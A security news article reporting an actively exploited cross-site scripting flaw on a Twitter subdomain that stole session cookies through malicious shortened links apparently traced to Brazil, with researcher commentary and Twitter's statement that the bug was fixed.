A dangerous XSS bug surfaced on Twitter on Monday, and researchers have seen active exploits for the bug, which allows an attacker to steal the session cookie of a Twitter user with a simple click-and-you’re-owned technique.
Experts say that the attacks seem to be emanating from domains in Brazil, and that more than 100,000 users had already clicked on one malicious shortened URL related to the attack.And that’s just one link. It’s unclear how many other malicious links have been created to exploit this flaw.
“The malicious JavaScript payload that’s being distributed is rather
simple. It uses an XSS (Cross-Site Scripting) vulnerability to steal the
cookie of the Twitter user, which is transferred to two specific
servers. Essentially, any account which clicked on the malicious links
is compromised,” Stefan Tanase, an anti-malware researcher who specializes in social networking threats at Kaspersky Lab, said in an analysis of the Twitter exploit.
“All clues point to Brazil as the originating country for this attack.
First, the 2 domain names used to get the stolen cookies are registered
under Brazilian names. More than that, one of them is actually also
hosted in Brazil.”
One of the tweets used to direct users to the malicious site exploiting the XSS bug is written in Brazilian Portuguese and references a Brazilian band.
Twitter officials said on Tuesday morning that the vulnerability has been fixed. However, the XSS flaw, which was on one of the many sub-domains that Twitter maintains, may just be the tip of the iceberg for the massively popular social networking platform. The shortened URLs that are essentially mandatory on Twitter, thanks to the platform’s 140-character limit on messages, are a serious weak link in the site’s security.
In many cases, users have no idea where these URLs will actually take them before they clink on them, and attackers have pounced on this and used it to direct users to malicious sites that then launch drive-by attacks. This has turned out to be a deep well of exploitable fun for the attackers, and the XSS bug on Twitter is just one way for them to do their dirt. There are plenty of others, and researchers point out that the tens of thousands of third-party applications that use Twitter’s API are a good target, as well.
“They have ~70k other other serious problems on other domains, aka Twitter apps,” researcher Aviv Raff said in a Twitter message on Tuesday.